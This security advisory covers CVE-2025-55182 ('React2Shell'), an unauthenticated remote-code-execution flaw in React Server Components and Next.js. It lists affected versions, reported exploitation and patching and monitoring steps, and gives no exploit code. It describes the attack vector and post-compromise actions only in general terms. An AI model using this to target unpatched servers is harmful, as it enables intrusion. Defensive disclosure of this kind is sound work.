CVE-2025-55182, also known as React2Shell, is a critical unauthenticated remote-code-execution vulnerability in React Server Components (RSC) that allows attackers to execute arbitrary code on the backend server by sending a specially crafted web request to a vulnerable React or Next.js application.
The issue affects the core React server rendering pipeline and does not require authentication or user interaction. If a vulnerable application is exposed to the internet, it can be exploited directly.
Technical details
Unsafe deserialization in the React Flight protocol used by React Server Components allows attacker-controlled input to be interpreted as executable server-side code. This results in unauthenticated remote code execution.
Affected versions:
- react-server-dom-webpack 19.0, 19.1.0, 19.1.1, 19.2.0
- react-server-dom-parcel 19.0, 19.1.0, 19.1.1, 19.2.0
- react-server-dom-turbopack 19.0, 19.1.0, 19.1.1, 19.2.0
- Next.js applications using the App Router prior to patched releases
Attack vector:
HTTP requests to React Server Component endpoints that abuse the Flight serialization mechanism to inject executable payloads. Successful exploitation results in immediate command execution under the web application process.
Precondition:
The application must be publicly reachable and running a vulnerable React Server Component implementation. Authentication is not required.
Evidence of exploitation
Security researchers confirm that active exploitation began within hours of public disclosure. Large-scale automated scanning targeting exposed React and Next.js applications has been observed globally.
Multiple confirmed breaches have already occurred across SaaS platforms, fintech, logistics, education, and government-adjacent infrastructure. Intelligence reporting also links early-stage exploitation to China-linked threat actors, as well as opportunistic access-broker and cybercriminal activity.
This exploitation pattern closely mirrors the early stages of the Log4Shell vulnerability in terms of speed, automation, and global reach. On December 11, CISA added CVE-2025-55182 to its list of Known Exploited Vulnerabilities (KEV).
Risk & Impact assessment
The risk of exploitation is high to critical due to:
- Unauthenticated remote code execution
- Public proof-of-concept exploits
- Mass automated scanning
- Active real-world exploitation
Impact if exploited:
If exploited, attackers can achieve full application server compromise, enabling theft of cloud credentials, API keys, and other sensitive secrets. This access allows unauthorized database access, deployment of webshells and persistent backdoors, and ultimately lateral movement into internal networks for further compromise.
Organizations running public-facing React or Next.js infrastructure should treat this as a direct server takeover risk, not merely a data exposure issue.
Preventive Measures
Patch now:
Upgrade all affected React server packages and Next.js applications to patched versions immediately. Redeploy all affected services after patching.
Isolate & restrict:
Restrict public access to React Server Component endpoints where possible. Enforce strict firewall, security group, and reverse proxy rules.
Rotate credentials & keys:
Rotate application secrets, service tokens, API keys, and cloud credentials for any application that was internet-facing.
Monitor:
Increase monitoring for unusual requests to server-rendering endpoints, unexpected shell execution by Node.js processes, and abnormal outbound connections from web servers.
Stay Safe. Stay Secure.
OP Innovate Research Team
